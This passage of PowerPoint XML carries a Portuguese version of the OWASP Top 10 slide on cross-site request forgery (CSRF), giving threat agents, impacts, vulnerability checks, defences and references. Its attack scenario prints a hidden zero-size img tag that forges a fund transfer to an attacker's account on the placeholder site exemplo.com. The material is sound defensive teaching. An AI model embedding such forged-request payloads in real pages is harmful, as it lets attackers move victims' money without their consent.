                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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06956">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere qualquer pessoa que possa carregar conteúdo nos navegadores dos usuários, e assim forçá-los a fazer uma requisição para seu site. Qualquer site ou outro serviço html que usuários acessam pode fazer isso.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O atacante forja requisições HTTP falsas e engana uma vitima submetendo-a a um ataque através de tags de imagem, XSS, ou inúmeras outras  técnicas. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Se o usuário estiver autenticado</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, o ataque é bem sucedido.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> se aproveita do fato de que a maioria das aplicações web permitem que os atacantes prevejam todos os detalhes de uma ação particular da aplicação. Como os navegadores automaticamente trafegam credenciais como cookies de sessão, os atacantes podem criar páginas web maliciosas que geram requisições forjadas indistinguíveis das legítimas. Detecção de falhas de CSRF é bastante simples através de testes de penetração ou de análise de código.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Os atacantes podem enganar suas fazendo com que executem operações de mudança de estado que a vítima está autorizada a realizar, por ex., atualizando detalhes da sua conta, comprando, deslogando ou até mesmo efetuando login.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio dos dados ou funções afetadas da aplicação. Imagine não ter a certeza se os usuários tem a intenção de realizar tais ações.  </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o impacto na sua reputação.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6477000"/>
            <a:ext cx="3383280" cy="26670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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A aplicação permite que um usuário submeta uma requisição de mudança de estado que não inclui qualquer segredo. Por exemplo:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://exemplo.com/app/transferirFundos?quantia=1500</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contaDestino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=4673243243</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Com isso, o atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constrói </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma requisição que irá transferir dinheiro da conta da vítima para a conta do atacante, e então incorpora este ataque em uma requisição armazenada em uma imagem ou iframe em vários sites sob o controle do atacante:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://exemplo.com/app/transferirFundos?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  quantia=1500&amp;contaDestino=contaAtacante#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  width="0" height="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se a vítima </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qualquer um dos sites do atacante enquanto estiver autenticado em exemplo.com, essas requisições forjadas irão incluir automaticamente informações de sessão do usuário, autorizando o pedido do atacante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3733800"/>
            <a:ext cx="3383280" cy="26670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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para verificar se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>é vulnerável, verifique se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quaisquer links </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e formulários não possuam um token imprevisível de CSRF. Sem um token, os atacantes podem forjar requisições maliciosas. Uma alternativa de defesa é solicitar que o usuário prove a intenção de submeter a requisição, seja através de uma autenticação, ou alguma outra prova de que é um usuário real (por exemplo, um CAPTCHA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Concentre-se nos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>links e formulários que invocam funções de mudança de estado, uma vez que esses são os alvos mais importantes de um CSRF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Você deve verificar as transações em várias etapas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>já que elas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>não são inerentemente imunes. Os atacantes podem facilmente forjar uma série de requisições usando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>múltiplas tags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou possivelmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java Script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note que os cookies de sessão, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>endereços IP de origem, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e outras informações </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que são enviadas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automaticamente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pelo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navegador não fornecem nenhuma defesa contra CSRF uma vez que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elas também são incluídas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requisições forjadas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ferramenta de teste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CSRF Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auxiliar com geração de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>casos de teste para demonstrar os perigos das falhas de CSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6477000"/>
            <a:ext cx="3383280" cy="26670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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>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7"/>
              </a:rPr>
              <a:t>OWASP CSRF Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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8"/>
              </a:rPr>
              <a:t>OWASP CSRF Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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7"/>
              </a:rPr>
              <a:t>OWASP CSRFGuard - CSRF Defense Tool </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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9"/>
              </a:rPr>
              <a:t>ESAPI Project Home Page </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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10"/>
              </a:rPr>
              <a:t>ESAPI HTTPUtilities Class with AntiCSRF Tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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11"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on CSRF Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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5"/>
              </a:rPr>
              <a:t>OWASP CSRFTester - CSRF Testing Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
